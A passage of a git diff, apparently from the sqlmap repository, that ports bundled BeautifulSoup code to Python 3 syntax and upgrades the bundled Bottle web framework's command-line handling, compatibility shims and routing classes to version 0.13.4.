= nestingResetTriggers != None - isResetNesting = self.RESET_NESTING_TAGS.has_key(name) + isResetNesting = name in self.RESET_NESTING_TAGS popTo = None inclusive = True for i in xrange(len(self.tagStack)-1, 0, -1): @@ -1311,7 +1332,7 @@ def _smartPop(self, name): if (nestingResetTriggers is not None and p.name in nestingResetTriggers) \ or (nestingResetTriggers is None and isResetNesting - and self.RESET_NESTING_TAGS.has_key(p.name)): + and p.name in self.RESET_NESTING_TAGS): #If we encounter one of the nesting reset triggers #peculiar to this tag, or we encounter another tag @@ -1457,8 +1478,8 @@ def parse_declaration(self, i): self._toStringSubclass(data, CData) else: try: - j = SGMLParser.parse_declaration(self, i) - except SGMLParseError: + j = sgmllib.SGMLParser.parse_declaration(self, i) + except sgmllib.SGMLParseError: toHandle = self.rawdata[i:] self.handle_data(toHandle) j = i + len(toHandle) @@ -1513,7 +1534,7 @@ class BeautifulSoup(BeautifulStoneSoup): BeautifulStoneSoup before writing your own subclass.""" def __init__(self, *args, **kwargs): - if not kwargs.has_key('smartQuotesTo'): + if 'smartQuotesTo' not in kwargs: kwargs['smartQuotesTo'] = self.HTML_ENTITIES kwargs['isHTML'] = True BeautifulStoneSoup.__init__(self, *args, **kwargs) @@ -1568,7 +1589,7 @@ def __init__(self, *args, **kwargs): NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) # Used to detect the charset in a META tag; see start_meta - CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M) + CHARSET_RE = re.compile(r"((^|;)\s*charset=)([^;]*)", re.M) def start_meta(self, attrs): """Beautiful Soup can detect a charset included in a META tag, @@ -1770,9 +1791,9 @@ def __init__(self, markup, overrideEncodings=[], self._detectEncoding(markup, isHTML) self.smartQuotesTo = smartQuotesTo self.triedEncodings = [] - if markup == '' or isinstance(markup, unicode): + if markup == '' or isinstance(markup, text_type): self.originalEncoding = None - self.unicode = unicode(markup) + self.unicode = text_type(markup) return u = None @@ -1785,7 +1806,7 @@ def __init__(self, markup, overrideEncodings=[], if u: break # If no luck and we have auto-detection library, try that: - if not u and chardet and not isinstance(self.markup, unicode): + if not u and chardet and not isinstance(self.markup, text_type): u = self._convertFrom(chardet.detect(self.markup)['encoding']) # As a last resort, try utf-8 and windows-1252: @@ -1821,7 +1842,7 @@ def _convertFrom(self, proposed): "iso-8859-1", "iso-8859-2"): markup = re.compile("([\x80-\x9f])").sub \ - (lambda(x): self._subMSChar(x.group(1)), + (lambda x: self._subMSChar(x.group(1)), markup) try: @@ -1829,7 +1850,7 @@ def _convertFrom(self, proposed): u = self._toUnicode(markup, proposed) self.markup = u self.originalEncoding = proposed - except Exception, e: + except Exception as e: # print "That didn't work!" # print e return None @@ -1858,7 +1879,7 @@ def _toUnicode(self, data, encoding): elif data[:4] == '\xff\xfe\x00\x00': encoding = 'utf-32le' data = data[4:] - newdata = unicode(data, encoding) + newdata = text_type(data, encoding) return newdata def _detectEncoding(self, xml_data, isHTML=False): @@ -1871,50 +1892,50 @@ def _detectEncoding(self, xml_data, isHTML=False): elif xml_data[:4] == '\x00\x3c\x00\x3f': # UTF-16BE sniffed_xml_encoding = 'utf-16be' - xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') + xml_data = text_type(xml_data, 'utf-16be').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ and (xml_data[2:4] != '\x00\x00'): # UTF-16BE with BOM sniffed_xml_encoding = 'utf-16be' - xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') + xml_data = text_type(xml_data[2:], 'utf-16be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x3f\x00': # UTF-16LE sniffed_xml_encoding = 'utf-16le' - xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') + xml_data = text_type(xml_data, 'utf-16le').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ (xml_data[2:4] != '\x00\x00'): # UTF-16LE with BOM sniffed_xml_encoding = 'utf-16le' - xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') + xml_data = text_type(xml_data[2:], 'utf-16le').encode('utf-8') elif xml_data[:4] == '\x00\x00\x00\x3c': # UTF-32BE sniffed_xml_encoding = 'utf-32be' - xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') + xml_data = text_type(xml_data, 'utf-32be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x00\x00': # UTF-32LE sniffed_xml_encoding = 'utf-32le' - xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') + xml_data = text_type(xml_data, 'utf-32le').encode('utf-8') elif xml_data[:4] == '\x00\x00\xfe\xff': # UTF-32BE with BOM sniffed_xml_encoding = 'utf-32be' - xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') + xml_data = text_type(xml_data[4:], 'utf-32be').encode('utf-8') elif xml_data[:4] == '\xff\xfe\x00\x00': # UTF-32LE with BOM sniffed_xml_encoding = 'utf-32le' - xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') + xml_data = text_type(xml_data[4:], 'utf-32le').encode('utf-8') elif xml_data[:3] == '\xef\xbb\xbf': # UTF-8 with BOM sniffed_xml_encoding = 'utf-8' - xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') + xml_data = text_type(xml_data[3:], 'utf-8').encode('utf-8') else: sniffed_xml_encoding = 'ascii' pass except: xml_encoding_match = None xml_encoding_match = re.compile( - '^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data) + r'^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data) if not xml_encoding_match and isHTML: - regexp = re.compile('<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I) + regexp = re.compile(r'<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I) xml_encoding_match = regexp.search(xml_data) if xml_encoding_match is not None: xml_encoding = xml_encoding_match.groups()[0].lower() @@ -2009,6 +2030,5 @@ def _ebcdic_to_ascii(self, s): #By default, act as an HTML pretty-printer. if __name__ == '__main__': - import sys soup = BeautifulSoup(sys.stdin) - print soup.prettify() + print(soup.prettify()) diff --git a/thirdparty/bottle/__init__.py b/thirdparty/bottle/__init__.py index 9e1072a9c4f..2ae28399f5f 100644 --- a/thirdparty/bottle/__init__.py +++ b/thirdparty/bottle/__init__.py @@ -1,8 +1 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - pass diff --git a/thirdparty/bottle/bottle.py b/thirdparty/bottle/bottle.py index 62c9010ea99..e0b3185d27d 100644 --- a/thirdparty/bottle/bottle.py +++ b/thirdparty/bottle/bottle.py @@ -1,77 +1,90 @@ #!/usr/bin/env python # -*- coding: utf-8 -*- +from __future__ import print_function """ Bottle is a fast and simple micro-framework for small web applications. It -offers request dispatching (Routes) with url parameter support, templates, +offers request dispatching (Routes) with URL parameter support, templates, a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and template engines - all in a single file and with no dependencies other than the Python Standard Library. Homepage and documentation: http://bottlepy.org/ -Copyright (c) 2012, Marcel Hellkamp. +Copyright (c) 2009-2024, Marcel Hellkamp. License: MIT (see LICENSE for details) """ -from __future__ import with_statement +import sys __author__ = 'Marcel Hellkamp' -__version__ = '0.12-dev' +__version__ = '0.13.4' __license__ = 'MIT' -# The gevent server adapter needs to patch some modules before they are imported -# This is why we parse the commandline parameters here but handle them later -if __name__ == '__main__': - from optparse import OptionParser - _cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app") - _opt = _cmd_parser.add_option - _opt("--version", action="store_true", help="show version number.") - _opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") - _opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") - _opt("-p", "--plugin", action="append", help="install additional plugin/s.") - _opt("--debug", action="store_true", help="start server in debug mode.") - _opt("--reload", action="store_true", help="auto-reload on file changes.") - _cmd_options, _cmd_args = _cmd_parser.parse_args() - if _cmd_options.server and _cmd_options.server.startswith('gevent'): - import gevent.monkey; gevent.monkey.patch_all() - -import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\ - os, re, subprocess, sys, tempfile, threading, time, urllib, warnings +############################################################################### +# Command-line interface ###################################################### +############################################################################### +# INFO: Some server adapters need to monkey-patch std-lib modules before they +# are imported. This is why some of the command-line handling is done here, but +# the actual call to _main() is at the end of the file. -from datetime import date as datedate, datetime, timedelta -from tempfile import TemporaryFile -from traceback import format_exc, print_exc -try: from json import dumps as json_dumps, loads as json_lds -except ImportError: # pragma: no cover - try: from simplejson import dumps as json_dumps, loads as json_lds - except ImportError: - try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds - except ImportError: - def json_dumps(data): - raise ImportError("JSON support requires Python 2.6 or simplejson.") - json_lds = json_dumps +def _cli_parse(args): # pragma: no coverage + from argparse import ArgumentParser + + parser = ArgumentParser(prog=args[0], usage="%(prog)s [options] package.module:app") + opt = parser.add_argument + opt("--version", action="store_true", help="show version number.") + opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") + opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") + opt("-p", "--plugin", action="append", help="install additional plugin/s.") + opt("-c", "--conf", action="append", metavar="FILE", + help="load config values from FILE.") + opt("-C", "--param", action="append", metavar="NAME=VALUE", + help="override config values.") + opt("--debug", action="store_true", help="start server in debug mode.") + opt("--reload", action="store_true", help="auto-reload on file changes.") + opt('app', help='WSGI app entry point.', nargs='?') + + cli_args = parser.parse_args(args[1:]) + + return cli_args, parser +def _cli_patch(cli_args): # pragma: no coverage + parsed_args, _ = _cli_parse(cli_args) + opts = parsed_args + if opts.server: + if opts.server.startswith('gevent'): + import gevent.monkey + gevent.monkey.patch_all() + elif opts.server.startswith('eventlet'): + import eventlet + eventlet.monkey_patch() -# We now try to fix 2.5/2.6/3.1/3.2 incompatibilities. -# It ain't pretty but it works... Sorry for the mess. -py = sys.version_info -py3k = py >= (3,0,0) -py25 = py < (2,6,0) -py31 = (3,1,0) <= py < (3,2,0) +if __name__ == '__main__': + _cli_patch(sys.argv) + +############################################################################### +# Imports and Python 2/3 unification ########################################## +############################################################################### -# Workaround for the missing "as" keyword in py3k. -def _e(): return sys.exc_info()[1] +import base64, calendar, email.utils, functools, hmac, itertools,\ + mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib + +from types import FunctionType +from datetime import date as datedate, datetime, timedelta +from tempfile import NamedTemporaryFile +from traceback import format_exc, print_exc +from unicodedata import normalize -# Workaround for the "print is a keyword/function" Python 2/3 dilemma -# and a fallback for mod_wsgi (resticts stdout/err attribute access) try: - _stdout, _stderr = sys.stdout.write, sys.stderr.write -except IOError: - _stdout = lambda x: sys.stdout.write(x) - _stderr = lambda x: sys.stderr.write(x) + from ujson import dumps as json_dumps, loads as json_lds +except ImportError: + from json import dumps as json_dumps, loads as json_lds + +py = sys.version_info +py3k = py.major > 2 # Lots of stdlib and builtin differences. if py3k: @@ -80,75 +93,113 @@ def _e(): return sys.exc_info()[1] from urllib.parse import urljoin, SplitResult as UrlSplitResult from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote urlunquote = functools.partial(urlunquote, encoding='latin1') - from http.cookies import SimpleCookie - from collections import MutableMapping as DictMixin + from http.cookies import SimpleCookie, Morsel, CookieError + from collections.abc import MutableMapping as DictMixin + from types import ModuleType as new_module import pickle from io import BytesIO + import configparser + from datetime import timezone + UTC = timezone.utc + # getfullargspec was deprecated in 3.5 and un-deprecated in 3.6 + # getargspec was deprecated in 3.0 and removed in 3.11 + from inspect import getfullargspec + def getargspec(func): + spec = getfullargspec(func) + kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs) + return kwargs, spec[1], spec[2], spec[3] + basestring = str unicode = str json_loads = lambda s: json_lds(touni(s)) callable = lambda x: hasattr(x, '__call__') imap = map -else: # 2.x + + def _raise(*a): + raise a[0](a[1]).with_traceback(a[2]) +else: # 2.x + warnings.warn("Python 2 support will be dropped in Bottle 0.14", DeprecationWarning) import httplib import thread from urlparse import urljoin, SplitResult as UrlSplitResult from urllib import urlencode, quote as urlquote, unquote as urlunquote - from Cookie import SimpleCookie + from Cookie import SimpleCookie, Morsel, CookieError from itertools import imap import cPickle as pickle + from imp import new_module from StringIO import StringIO as BytesIO - if py25: - msg = "Python 2.5 support may be dropped in future versions of Bottle." - warnings.warn(msg, DeprecationWarning) - from UserDict import DictMixin - def next(it): return it.next() - bytes = str - else: # 2.6, 2.7 - from collections import MutableMapping as DictMixin + import ConfigParser as configparser + from collections import MutableMapping as DictMixin + from inspect import getargspec + from datetime import tzinfo + + class _UTC(tzinfo): + def utcoffset(self, dt): return timedelta(0) + def tzname(self, dt): return "UTC" + def dst(self, dt): return timedelta(0) + UTC = _UTC() + + unicode = unicode json_loads = json_lds + exec(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec')) + # Some helpers for string/byte handling def tob(s, enc='utf8'): - return s.encode(enc) if isinstance(s, unicode) else bytes(s) + if isinstance(s, unicode): + return s.encode(enc) + return b'' if s is None else bytes(s) + + def touni(s, enc='utf8', err='strict'): - return s.decode(enc, err) if isinstance(s, bytes) else unicode(s) + if isinstance(s, bytes): + return s.decode(enc, err) + return unicode("" if s is None else s) + + tonat = touni if py3k else tob -# 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense). -# 3.1 needs a workaround. -if py31: - from io import TextIOWrapper - class NCTextIOWrapper(TextIOWrapper): - def close(self): pass # Keep wrapped buffer open. -# File uploads (which are implemented as empty FiledStorage instances...) -# have a negative truth value. That makes no sense, here is a fix. -class FieldStorage(cgi.FieldStorage): - def __nonzero__(self): return bool(self.list or self.file) - if py3k: __bool__ = __nonzero__ +def _stderr(*args): + try: + print(*args, file=sys.stderr) + except (IOError, AttributeError): + pass # Some environments do not allow printing (mod_wsgi) + # A bug in functools causes it to break if the wrapper is an instance method def update_wrapper(wrapper, wrapped, *a, **ka): - try: functools.update_wrapper(wrapper, wrapped, *a, **ka) - except AttributeError: pass - - + try: + functools.update_wrapper(wrapper, wrapped, *a, **ka) + except AttributeError: + pass # These helpers are used at module level and need to be defined first. # And yes, I know PEP-8, but sometimes a lower-case classname makes more sense. -def depr(message): - warnings.warn(message, DeprecationWarning, stacklevel=3) -def makelist(data): # This is just to handy - if isinstance(data, (tuple, list, set, dict)): return list(data) - elif data: return [data] - else: return [] +def depr(major, minor, cause, fix, stacklevel=3): + text = "Warning: Use of deprecated feature or API. (Deprecated in Bottle-%d.%d)\n"\ + "Cause: %s\n"\ + "Fix: %s\n" % (major, minor, cause, fix) + if DEBUG == 'strict': + raise DeprecationWarning(text) + warnings.warn(text, DeprecationWarning, stacklevel=stacklevel) + return DeprecationWarning(text) + + +def makelist(data): # This is just too handy + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] class DictProperty(object): - ''' Property that maps to a key in a local dict-like attribute. ''' + """ Property that maps to a key in a local dict-like attribute. """ + def __init__(self, attr, key=None, read_only=False): self.attr, self.key, self.read_only = attr, key, read_only @@ -173,11 +224,12 @@ def __delete__(self, obj): class cached_property(object): - ''' A property that is only computed once per instance and then replaces + """ A property that is only computed once per instance and then replaces itself with an ordinary attribute. Deleting the attribute resets the - property. ''' + property. """ def __init__(self, func): + update_wrapper(self, func) self.func = func def __get__(self, obj, cls): @@ -187,7 +239,8 @@ def __get__(self, obj, cls): class lazy_attribute(object): - ''' A property that caches itself to the class object. ''' + """ A property that caches itself to the class object. """ + def __init__(self, func): functools.update_wrapper(self, func, updated=[]) self.getter = func @@ -198,12 +251,8 @@ def __get__(self, obj, cls): return value - - - - ############################################################################### -# Exceptions and Events ######################################################## +# Exceptions and Events ####################################################### ############################################################################### @@ -211,11 +260,6 @@ class BottleException(Exception): """ A base class for exceptions used by bottle. """ pass - - - - - ############################################################################### # Routing ###################################################################### ############################################################################### @@ -229,19 +273,31 @@ class RouteReset(BottleException): """ If raised by a plugin or request handler, the route is reset and all plugins are re-applied. """ -class RouterUnknownModeError(RouteError): pass + +class RouterUnknownModeError(RouteError): + + pass class RouteSyntaxError(RouteError): - """ The route parser found something not supported by this router """ + """ The route parser found something not supported by this router. """ class RouteBuildError(RouteError): - """ The route could not been built """ + """ The route could not be built. """ + + +def _re_flatten(p): + """ Turn all capturing groups in a regular expression pattern into + non-capturing groups. """ + if '(' not in p: + return p + return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))', lambda m: m.group(0) if + len(m.group(1)) % 2 else m.group(1) + '(?:', p) class Router(object): - ''' A Router is an ordered collection of route->target pairs. It is used to + """ A Router is an ordered collection of route->target pairs. It is used to efficiently match WSGI requests against a number of routes and return the first target that satisfies the request. The target may be anything, usually a string, ID or callable object. A route consists of a path-rule @@ -250,177 +306,212 @@ class Router(object): The path-rule is either a static path (e.g. `/contact`) or a dynamic path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax and details on the matching order are described in docs:`routing`. - ''' + """ default_pattern = '[^/]+' - default_filter = 're' - #: Sorry for the mess. It works. Trust me. - rule_syntax = re.compile('(\\\\*)'\ - '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\ - '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\ - '(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))') + default_filter = 're' + + #: The current CPython regexp implementation does not allow more + #: than 99 matching groups per regular expression. + _MAX_GROUPS_PER_PATTERN = 99 def __init__(self, strict=False): - self.rules = {} # A {rule: Rule} mapping - self.builder = {} # A rule/name->build_info mapping - self.static = {} # Cache for static routes: {path: {method: target}} - self.dynamic = [] # Cache for dynamic routes. See _compile() + self.rules = [] # All rules in order + self._groups = {} # index of regexes to find them in dyna_routes + self.builder = {} # Data structure for the url builder + self.static = {} # Search structure for static routes + self.dyna_routes = {} + self.dyna_regexes = {} # Search structure for dynamic routes #: If true, static routes are no longer checked first. self.strict_order = strict - self.filters = {'re': self.re_filter, 'int': self.int_filter, - 'float': self.float_filter, 'path': self.path_filter} - - def re_filter(self, conf): - return conf or self.default_pattern, None, None - - def int_filter(self, conf): - return r'-?\d+', int, lambda x: str(int(x)) - - def float_filter(self, conf): - return r'-?[\d.]+', float, lambda x: str(float(x)) - - def path_filter(self, conf): - return r'.+?', None, None + self.filters = { + 're': lambda conf: (_re_flatten(conf or self.default_pattern), + None, None), + 'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))), + 'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))), + 'path': lambda conf: (r'.+?', None, None) + } def add_filter(self, name, func): - ''' Add a filter. The provided function is called with the configuration + """ Add a filter. The provided function is called with the configuration string as parameter and must return a (regexp, to_python, to_url) tuple. - The first element is a string, the last two are callables or None. ''' + The first element is a string, the last two are callables or None. """ self.filters[name] = func - def parse_rule(self, rule): - ''' Parses a rule into a (name, filter, conf) token stream. If mode is - None, name contains a static rule part. ''' + rule_syntax = re.compile('(\\\\*)' + '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)' + '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)' + '(?::((?:\\\\.|[^\\\\>])+)?)?)?>))') + + def _itertokens(self, rule): offset, prefix = 0, '' for match in self.rule_syntax.finditer(rule): prefix += rule[offset:match.start()] g = match.groups() - if len(g[0])%2: # Escaped wildcard + if g[2] is not None: + depr(0, 13, "Use of old route syntax.", + "Use <name> instead of :name in routes.", + stacklevel=4) + if len(g[0]) % 2: # Escaped wildcard prefix += match.group(0)[len(g[0]):] offset = match.end() continue - if prefix: yield prefix, None, None - name, filtr, conf = g[1:4] if not g[2] is None else g[4:7] - if not filtr: filtr = self.default_filter - yield name, filtr, conf or None + if prefix: + yield prefix, None, None + name, filtr, conf = g[4:7] if g[2] is None else g[1:4] + yield name, filtr or 'default', conf or None offset, prefix = match.end(), '' if offset <= len(rule) or prefix: - yield prefix+rule[offset:], None, None + yield prefix + rule[offset:], None, None def add(self, rule, method, target, name=None): - ''' Add a new route or replace the target for an existing route. ''' - if rule in self.rules: - self.rules[rule][method] = target - if name: self.builder[name] = self.builder[rule] - return - - target = self.rules[rule] = {method: target} - - # Build pattern and other structures for dynamic routes - anons = 0 # Number of anonymous wildcards - pattern = '' # Regular expression pattern - filters = [] # Lists of wildcard input filters - builder = [] # Data structure for the URL builder + """ Add a new rule or replace the target for an existing rule. """ + anons = 0 # Number of anonymous wildcards found + keys = [] # Names of keys + pattern = '' # Regular expression pattern with named groups + filters = [] # Lists of wildcard input filters + builder = [] # Data structure for the URL builder is_static = True - for key, mode, conf in self.parse_rule(rule): + + for key, mode, conf in self._itertokens(rule): if mode: is_static = False + if mode == 'default': mode = self.default_filter mask, in_filter, out_filter = self.filters[mode](conf) - if key: - pattern += '(?P<%s>%s)' % (key, mask) - else: + if not key: pattern += '(?:%s)' % mask - key = 'anon%d' % anons; anons += 1 + key = 'anon%d' % anons + anons += 1 + else: + pattern += '(?P<%s>%s)' % (key, mask) + keys.append(key) if in_filter: filters.append((key, in_filter)) builder.append((key, out_filter or str)) elif key: pattern += re.escape(key) builder.append((None, key)) + self.builder[rule] = builder if name: self.builder[name] = builder if is_static and not self.strict_order: - self.static[self.build(rule)] = target + self.static.setdefault(method, {}) + self.static[method][self.build(rule)] = (target, None) return - def fpat_sub(m): - return m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:' - flat_pattern = re.sub(r'(\\*)(\(\?P<[^>]*>|\((?!\?))', fpat_sub, pattern) - try: - re_match = re.compile('^(%s)$' % pattern).match - except re.error: - raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e())) - - def match(path): - """ Return an url-argument dictionary. """ - url_args = re_match(path).groupdict() - for name, wildcard_filter in filters: - try: - url_args[name] = wildcard_filter(url_args[name]) - except ValueError: - raise HTTPError(400, 'Path has wrong format.') - return url_args + re_pattern = re.compile('^(%s)$' % pattern) + re_match = re_pattern.match + except re.error as e: + raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, e)) + + if filters: + + def getargs(path): + url_args = re_match(path).groupdict() + for name, wildcard_filter in filters: + try: + url_args[name] = wildcard_filter(url_args[name]) + except ValueError: + raise HTTPError(400, 'Path has wrong format.') + return url_args + elif re_pattern.groupindex: + + def getargs(path): + return re_match(path).groupdict() + else: + getargs = None - try: - combined = '%s|(^%s$)' % (self.dynamic[-1][0].pattern, flat_pattern) - self.dynamic[-1] = (re.compile(combined), self.dynamic[-1][1]) - self.dynamic[-1][1].append((match, target)) - except (AssertionError, IndexError): # AssertionError: Too many groups - self.dynamic.append((re.compile('(^%s$)' % flat_pattern), - [(match, target)])) - return match + flatpat = _re_flatten(pattern) + whole_rule = (rule, flatpat, target, getargs) + + if (flatpat, method) in self._groups: + if DEBUG: + msg = 'Route <%s %s> overwrites a previously defined route' + warnings.warn(msg % (method, rule), RuntimeWarning, stacklevel=3) + self.dyna_routes[method][ + self._groups[flatpat, method]] = whole_rule + else: + self.dyna_routes.setdefault(method, []).append(whole_rule) + self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1 + + self._compile(method) + + def _compile(self, method): + all_rules = self.dyna_routes[method] + comborules = self.dyna_regexes[method] = [] + maxgroups = self._MAX_GROUPS_PER_PATTERN + for x in range(0, len(all_rules), maxgroups): + some = all_rules[x:x + maxgroups] + combined = (flatpat for (_, flatpat, _, _) in some) + combined = '|'.join('(^%s$)' % flatpat for flatpat in combined) + combined = re.compile(combined).match + rules = [(target, getargs) for (_, _, target, getargs) in some] + comborules.append((combined, rules)) def build(self, _name, *anons, **query): - ''' Build an URL by filling the wildcards in a rule. ''' + """ Build an URL by filling the wildcards in a rule. """ builder = self.builder.get(_name) - if not builder: raise RouteBuildError("No route with that name.", _name) + if not builder: + raise RouteBuildError("No route with that name.", _name) try: - for i, value in enumerate(anons): query['anon%d'%i] = value - url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder]) - return url if not query else url+'?'+urlencode(query) - except KeyError: - raise RouteBuildError('Missing URL argument: %r' % _e().args[0]) + for i, value in enumerate(anons): + query['anon%d' % i] = value + url = ''.join([f(query.pop(n)) if n else f for (n, f) in builder]) + return url if not query else url + '?' + urlencode(query) + except KeyError as E: + raise RouteBuildError('Missing URL argument: %r' % E.args[0]) def match(self, environ): - ''' Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). ''' - path, targets, urlargs = environ['PATH_INFO'] or '/', None, {} - if path in self.static: - targets = self.static[path] - else: - for combined, rules in self.dynamic: - match = combined.match(path) - if not match: continue - getargs, targets = rules[match.lastindex - 1] - urlargs = getargs(path) if getargs else {} - break - - if not targets: - raise HTTPError(404, "Not found: " + repr(environ['PATH_INFO'])) - method = environ['REQUEST_METHOD'].upper() - if method in targets: - return targets[method], urlargs - if method == 'HEAD' and 'GET' in targets: - return targets['GET'], urlargs - if 'ANY' in targets: - return targets['ANY'], urlargs - allowed = [verb for verb in targets if verb != 'ANY'] - if 'GET' in allowed and 'HEAD' not in allowed: - allowed.append('HEAD') - raise HTTPError(405, "Method not allowed.", Allow=",".join(allowed)) + """ Return a (target, url_args) tuple or raise HTTPError(400/404/405). """ + verb = environ['REQUEST_METHOD'].upper() + path = environ['PATH_INFO'] or '/' + + methods = ('PROXY', 'HEAD', 'GET', 'ANY') if verb == 'HEAD' else ('PROXY', verb, 'ANY') + + for method in methods: + if method in self.static and path in self.static[method]: + target, getargs = self.static[method][path] + return target, getargs(path) if getargs else {} + elif method in self.dyna_regexes: + for combined, rules in self.dyna_regexes[method]: + match = combined(path) + if match: + target, getargs = rules[match.lastindex - 1] + return target, getargs(path) if getargs else {} + + # No matching route found. Collect alternative methods for 405 response + allowed = set([]) + nocheck = set(methods) + for method in set(self.static) - nocheck: + if path in self.static[method]: + allowed.add(method) + for method in set(self.dyna_regexes) - allowed - nocheck: + for combined, rules in self.dyna_regexes[method]: + match = combined(path) + if match: + allowed.add(method) + if allowed: + allow_header = ",".join(sorted(allowed)) + raise HTTPError(405, "Method not allowed.", Allow=allow_header) + + # No matching route and no alternative method found. We give up + raise HTTPError(404, "Not found: " + repr(path)) class Route(object): - ''' This class wraps a route callback along with route specific metadata and + """ This class wraps a route callback along with route specific metadata and configuration and applies Plugins on demand. It is also responsible for - turing an URL path rule into a regular expression usable by the Router. - ''' + turning an URL path rule into a regular expression usable by the Router. + """ - def __init__(self, app, rule, method, callback, name=None, - plugins=None, skiplist=None, **config): + def __init__(self, app, rule, method, callback, + name=None, + plugins=None, + skiplist=None, **config): #: The application this route is installed to. self.app = app - #: The path-rule string (e.g. ``/wiki/:page``). + #: The path-rule string (e.g. ``/wiki/<page>``). self.rule = rule #: The HTTP method as a string (e.g. ``GET``). self.method = method @@ -435,38 +526,26 @@ def __init__(self, app, rule, method, callback, name=None, #: Additional keyword arguments passed to the :meth:`Bottle.route` #: decorator are stored in this dictionary. Used for route-specific #: plugin configuration and meta-data. - self.config = ConfigDict(config) - - def __call__(self, *a, **ka): - depr("Some APIs changed to return Route() instances instead of"\ - " callables. Make sure to use the Route.call method and not to"\ - " call Route instances directly.") - return self.call(*a, **ka) + self.config = app.config._make_overlay() + self.config.load_dict(config) @cached_property def call(self): - ''' The route callback with all plugins applied. This property is - created on demand and then cached to speed up subsequent requests.''' + """ The route callback with all plugins applied. This property is + created on demand and then cached to speed up subsequent requests.""" return self._make_callback() def reset(self): - ''' Forget any cached values. The next time :attr:`call` is accessed, - all plugins are re-applied. ''' + """ Forget any cached values. The next time :attr:`call` is accessed, + all plugins are re-applied. """ self.__dict__.pop('call', None) def prepare(self): - ''' Do all on-demand work immediately (useful for debugging).''' + """ Do all on-demand work immediately (useful for debugging).""" self.call - @property - def _context(self): - depr('Switch to Plugin API v2 and access the Route object directly.') - return dict(rule=self.rule, method=self.method, callback=self.callback, - name=self.name, app=self.app, config=self.config, - apply=self.plugins, skip=self.skiplist) - def all_plugins(self): - ''' Yield all Plugins affecting this route. ''' + """ Yield all Plugins affecting this route. """ unique = set() for p in reversed(self.app.plugins + self.plugins): if True in self.skiplist: break @@ -481,24 +560,51 @@ def _make_callback(self): for plugin in self.all_plugins(): try: if hasattr(plugin, 'apply'): - api = getattr(plugin, 'api', 1) - context = self if api > 1 else self._context - callback = plugin.apply(callback, context) + callback = plugin.apply(callback, self) else: callback = plugin(callback) - except RouteReset: # Try again with changed configuration. + except RouteReset: # Try again with changed configuration. return self._make_callback() - if not callback is self.callback: + if callback is not self.callback: update_wrapper(callback, self.callback) return callback - def __repr__(self): - return '<%s %r %r>' % (self.method, self.rule, self.callback) - - - - + def get_undecorated_callback(self): + """ Return the callback. If the callback is a decorated function, try to + recover the original function. """ + func = self.callback + while True: + if getattr(func, '__wrapped__', False): + func = func.__wrapped__ + elif getattr(func, '__func__', False): + func = func.__func__ + elif getattr(func, '__closure__', False): + cells_values = (cell.cell_contents for cell in func.__closure__) + isfunc = lambda x: isinstance(x, FunctionType) or hasattr(x, '__call__') + func = next(iter(filter(isfunc, cells_values)), func) + else: + break + return func + + def get_callback_args(self): + """ Return a list of argument names the callback (most likely) accepts + as keyword arguments. If the callback is a decorated function, try + to recover the original function before inspection. """ + return getargspec(self.get_undecorated_callback())[0] + + def get_config(self, key, default=None): + """ Lookup a config field and return its value, first checking the + route.config, then route.app.config.""" + depr(0, 13, "Route.get_config() is deprecated.", + "The Route.config property already includes values from the" + " application config for missing keys. Access it directly.") + return self.config.get(key, default) + def __repr__(self): + cb = self.get_undecorated_callback() + return '<%s %s -> %s:%s>' % ( + self.method, self.rule, cb.__module__, getattr(cb, '__name__', '__call__') + ) ############################################################################### # Application Object ########################################################### 